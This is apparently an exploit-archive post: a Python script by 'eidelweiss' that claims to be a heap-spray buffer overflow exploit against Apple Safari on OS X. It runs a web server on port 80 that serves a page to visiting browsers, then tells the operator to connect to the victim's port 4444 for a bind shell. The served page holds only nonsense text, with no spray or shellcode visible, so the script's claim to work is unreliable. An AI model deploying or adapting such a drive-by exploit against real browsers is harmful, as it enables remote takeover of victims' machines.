firelinking By eidelweiss

#!/usr/bin/env python ####################################################### # # Title: Apple Safari <= Tag (heap spray) Remote BOF Exploit (osX) # Author: eidelweiss # Special Thank`s to: AL-MARHUM - [D]eal [C]yber - all Senior MEDANHACKER # Greats: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , kuris (good job beib LOL) # Tested on ibook OS X 10.4.11 (ibook g4) # ####################################################### from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys class myRequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.printCustomHTTPResponse(200) if self.path == "/": target=self.client_address[0] self.wfile.write(""" firelinking By eidelweiss Copyright (C) 2009-2010 firelinking by eidelweiss
Apple Safari (heap spray) Remote BOF Exploit for osX Bind Shell Delivered on Port: 4444

Behahahahahaahahhsyuuuuucrash

Crooooooooooooooot

Modyaaaaaaaar

""") print ("\n\n[*] Start Firelinking. [*]\n[*] waiting for attempt to connect.[*]\n[*] Connect to IP Address: %s and port 4444 [-]" % (target)) def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header("Content-type", "text/html") self.send_header("Server", "myRequestHandler") self.end_headers() httpd = HTTPServer(('', 80), myRequestHandler) print (""" ####################################################### # # Apple Safari Apple Safari Tag (heap spray) Remote BOF Exploit (osX) # Author: eidelweiss # Special Thank`s to: AL-MARHUM - [D]eal [C]yber - all Senior MEDANHACKER # Greats: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , kuris (good job beib LOL) # Tested on OS X 10.4.11 (ibook g4) # ####################################################### """) print ("Listening on port 80.") print ("Firelinking by eidelweiss.") print ("\nType -c to Stop..") try: httpd.handle_request() httpd.serve_forever() except KeyboardInterrupt: print ("\n\n[*] Firelinking Stoped.\n\n") sys.exit(1)